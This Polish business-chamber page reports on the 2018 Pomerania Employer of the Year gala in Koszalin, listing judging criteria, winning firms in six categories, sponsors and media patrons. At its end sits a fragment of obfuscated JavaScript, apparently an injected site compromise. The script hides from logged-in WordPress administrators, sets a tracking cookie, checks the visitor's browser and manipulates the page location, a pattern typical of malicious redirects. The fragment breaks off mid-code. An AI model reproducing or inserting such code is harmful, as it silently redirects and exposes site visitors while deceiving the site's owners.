Relacja z Gali Pracodawca Roku Pomorza 2018 | Północna Izba Gospodarcza w Koszalinie

Szanowni Państwo!

Dziękujemy Państwu za obecność na II Gali Pracodawca Roku Pomorza 2018. Zwycięzcom serdecznie gratulujemy, a wyróżnionym i wszystkim uczestnikom życzymy kolejnych sukcesów i powodzenia w kolejnej edycji Konkursu. Wszystkie zgłoszone firmy zasługują na uznanie i pochwałę za wdrożone rozwiązania wspierania pracowników, systemy motywacyjne dla pracowników oraz działania pro-społeczne i na rzecz ochrony środowiska. Jesteśmy przekonani, że to wyjątkowi Pracodawcy którzy są wizytówką Naszego Regionu.

FOTORELACJA >>

GALERIA ZDJĘĆ GAWEX >>

GALERIA ZDJĘĆ KOSZALININFO >>

Celem konkursu jest promowanie Pomorza jako regionu oferującego miejsca pracy w konkretnych przedsiębiorstwach, gwarantującym pracownikom sukces zawodowy i rozwój kariery. Tytuł „Pracodawcy Roku” jest gwarancją rzetelności przedsiębiorstwa dla pracowników szukających stałego zatrudnienia na godnych warunkach, podnosi rangę przedsiębiorstwa na rynku pracy i jest magnesem silnie przyciągającym najlepsze kadry. Szczególnie zależy nam, aby firmy godne naśladowania wyszły z cienia i budowały markę gospodarczą naszego regionu. Oceny przedsiębiorców uczestniczących w konkursie dokonała Kapituła Konkursu, która kierowała się między innymi:

  1. wdrożenia nowoczesnych form zarządzania zasobami ludzkimi
  2. podnoszenia kwalifikacji zawodowych pracowników
  3. przestrzegania prawa pracy
  4. zatrudniania pracowników z zagranicy
  5. benefity dla pracowników
  6. wspierania społeczności lokalnej oraz pracowników firmy (uczestnictwo i wspierania przedsięwzięć ważnych społecznie i akcji charytatywnych)
  7. otrzymania w ostatnim roku certyfikaty, nagrody i wyróżnienia w zakresie zarządzania przedsiębiorstwem
  8. organizowania staży i praktyk dla uczniów i studentów
  9. dbałości o zasoby i środowisko naturalne

„Pracodawcy Roku Pomorza 2018”:

W kategorii I mikroprzedsiębiorstwa (do 10 osób) zwycięzcą z tytułem Pracodawca Roku Pomorza 2018 została firma HAFTKOM S.C. – HAFTKOM istnieje od 1991 roku i jest firmą rodzinną. Oferuje haft komputerowy i nadruki na najwyższym poziomie. Firma stara się tworzyć dla pracowników rodzinną i komfortową atmosferę pracy. Kwalifikacje pracowników są rozwija w raz z postępem prowadzonej produkcji. Dla pracowników z najdłuższym stażem finansowane jest ubezpieczenie grupowe. Raz w tygodniu dla wszystkich pracowników są prowadzone ćwiczenia relaksujące w godzinach pracy.

W kategorii drugiej przedsiębiorstwa małe (do 50 osób) zwycięzcą z tytułem Pracodawca Roku Pomorza 2018 została firma SBC Windows & Doors Sp. z o. o. Spółka posiada w 100% kapitał norweski i zajmuje się produkcją skandynawskiej stolarki okiennej. Priorytetem firmy jest spełnienie oczekiwań i wymagań klientów a samą firmę charakteryzuje jakość, zarówno pod względem technicznym jak i administracyjnym.” Spółka cyklicznie podnosi kwalifikacje swoich pracowników, często przez szkolenia wewnętrzne. Prowadzi elektroniczny rejestr umiejętności pracowników, czym usprawnia proces zarządzania kadrami. Firma wspiera pracowników świadczeniami pozapłacowymi od integracji pracowników po zapewnianie zakwaterowania pracownikom zagranicznym.

W kategorii trzeciej przedsiębiorstwa średnie (do 250 osób) zwycięzcą z tytułem Pracodawca Roku Pomorza 2018 została firma Kongsberg Maritime Poland Sp. z o.o. Specjalizuje się w usługach oraz sprzedaży rozwiązań dla rynku elektroniki morskiej oraz technologii informacyjnych. Jako jeden z oddziałów norweskiego koncernu Kongsberg, świadczy usługi na całym świecie. Firma dba o konsekwentny rozwój pracowników, poszerzanie wiedzy i rozwój ich potencjału. Oferuje cykl szkoleń wstępnych dla nowych pracowników i szkolenia wewnętrzne dla już zatrudnionych. Kongsberg Martime dofinansowuje rożne formy edukacji nawet do 70% wartości. Co roku managerowie przechodzą kurs podnoszący kwalifikacje Posiada własny system e-lernigowy oraz laboratorium. Każdy dział posiada swój bank wiedzy. Firma dba o work-life balance, prowadzi elastyczne godziny pracy, oferuje bardzo szeroki zakres benefitów od prywatnej opieki zdrowotnej, przez prezenty okazjonalne, „chillroom” aż do wykupu akcji Firmy z 20% rabatem. Aktywnie uczestniczą życiu lokalnej społeczność współorganizując zbiórki, wspierając lokalny Szkolny Ośrodek Wychowawczy czy sponsorując zespół sportowy.

W kategorii czwartej przedsiębiorstwa duże (powyżej 250 osób) zwycięzcą z tytułem Pracodawca Roku Pomorza 2018 została firma GlobalLogic S.A. Firma rozpoczęła swoją działalność w Polsce w 2015 roku. GlobalLogic Polska specjalizuje się w oprogramowaniu systemów wbudowanych, aplikacjach internetowych, mobilnych oraz klasy enterprise, jak również realizuje projekty dla branż: automotive, telecommunication, web/mobile/enterprise solutions, IoT/M2M i security. Firma dba o projektowanie ścieżek zawodowych pracowników wszystkich szczebli, rozwój wiedzy i kompetencji inżynierów i managerów. Wspiera postawy prozdrowotne świadczeniami pozapłacowymi między innymi w postaci kart multisport, oferowania zdrowych przekąsek w postaci owoców, zajęć sportowych. GlobalLogic jako międzynarodowa firma silnie wspiera mobilność swoich pracowników, nie tylko przez delegowanie ich do oddziałów spółki w innych krajach, ale też zapewnienie pakietu relokacyjne i pomocy w poszukiwaniu mieszkania.

W kategorii piątej Społeczna odpowiedzialność biznesu – firma aktywna lokalnie oraz wykazująca dbałość o środowisko w którym zwycięzcą z tytułem Pracodawca Roku Pomorza 2018 została firma „Homanit Polska Spółka z o. o. i Spółka” Spółka Komandytowa. Firma bierze czynny udział w życiu lokalnej społeczności wspierając wiele przedsięwzięć takich jak np. dofinansowanie budowy budynków mieszkalnych w Mierzynie oraz Karlinie, wsparcie budowy hali sportowej. Homanit jest sponsorem KSW Róża – bokserskiego klubu sportowego. Cyklicznie wspiera Warsztaty Terapii Zajęciowej „Iskierka” w Karlinie, szkoły i przedszkola, świetlice wiejskie oraz inicjatywy takie jak Sundaysbikers Karlino Team a także współfinansuje pikniki i festyny okolicznych miejscowości. Homanit podpisał również list intencyjny zapewniając współpracę z Politechniką Koszalińską oraz Zespołem Szkół w Karlinie w celu utworzenia klas i kierunków technicznych, zapewniając miejsca praktyk zawodowych oraz pierwszeństwo w zatrudnieniu.

W kategorii szóstej Nauka dla Biznesu zwycięzcą został Zespół Szkół nr 10 im. Bolesława Chrobrego w Koszalinie. Szkoła organizuje praktyki w regionie a także zagraniczne, m.in. czterotygodniowe praktyki w Niemczech oraz w Hiszpanii. Staże zagraniczne odbywają również nauczyciele szkoły. Uczniowie szkoły współpracują przy obsłudze festiwalu Integracja Ty i Ja, współpracują z Automobilklubem koszalińskim w organizacji imprez takich jak np. Rajd Monte Karlino oraz w zakresie rozwijania zainteresowań w Koszalińskim Motoparku i Pałacu Młodzieży.

Składamy serdeczne podziękowania naszym Partnerom m.in.: Pomorskiego Banku Spółdzielczego w Świdwinie, Marketing Media House, Ad.Media Consulting oraz Sponsorów: PKO Bank Polski, Grupa Mojsiuk, Miasto Kołobrzeg, Piekarnia BAJGIEL, Gmina Potęgowo, Makro Cash & Carry, Browar Połczyn-Zdrój, Przedsiębiorstwo Gospodarki Komunalnej, Województwo Zachodniopomorskie oraz wszystkich firm, instytucji i osób które się w jakikolwiek sposób przyczyniły do organizacji tego wydarzenia.

Konkurs Pracodawca Roku Pomorza zostały objęte patronatem mediów: Głosu Koszalińskiego i portalu www.gk24.pl, Nasze Miasto Koszalin, Polskiego Radia Koszalin S.A., Prestiż magazyn koszaliński, Gawex Media, portalu Infoludek.pl, Radio Plus, Świat Biznesu, Koszalininfo.pl i Fakty Tygodnik Koszaliński, Kurier Szczeciński oraz Radio Gdańsk.

Dziękujemy!

Z poważaniem

Roman Biłas
Prezes Północnej Izby Gospodarczej
Oddział w Koszalinie

Kampania promocyjna laureatów II edycji Konkursu Pracodawca Roku Pomorza 2018

'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m